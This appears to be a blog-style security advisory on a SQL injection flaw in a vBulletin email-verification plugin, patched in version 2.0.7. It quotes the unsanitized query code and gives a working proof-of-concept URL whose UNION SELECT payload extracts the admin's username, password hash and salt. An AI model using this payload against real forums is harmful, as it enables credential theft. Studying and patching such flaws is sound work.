vBulletin Verify Email Before Registration Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164
Version: <= 2.0.6, patched in >= 2.0.7 (latest)

The vulnerability resides in the register_form_complete hook, and some other hooks.
First few lines of the register_form_complete hook:

if($so == 1){
	if($emailcode){
		$emailfromcode = $db->query_write("SELECT * FROM " . TABLE_PREFIX . "userregcode WHERE userregcode ='$emailcode';");
     
		if($db->num_rows($emailfromcode)){
			$emailfetched = $db->fetch_row($emailfromcode);
			$email = $emailconfirm = $emailfetched[1];
			$emailconfirmationcode = $emailcode;
		}else{
			eval(standard_error(fetch_error('thisemailhasbeenconfirmed')));
		}
	}
}
else{
	$code = md5(time()*rand());
}

The user input data is not sanitized before being used in queries. In this case we can exploit the $emailcode variable.

Proof of concept:
http://example.com/register.php?so=1&emailcode=1' UNION SELECT null, concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM user WHERE userid = '1

Now look at the source of the page and find:


Vulnerable hooks:
profile_updatepassword_complete (Email field when you want to change your email address after being logged in.)
register_addmember_complete (After submitting the final registration form.)
register_addmember_process
register_form_complete (This example)
register_start (Email confirmation form at register.php)

Leave a Reply

Your email address will not be published / Required fields are marked *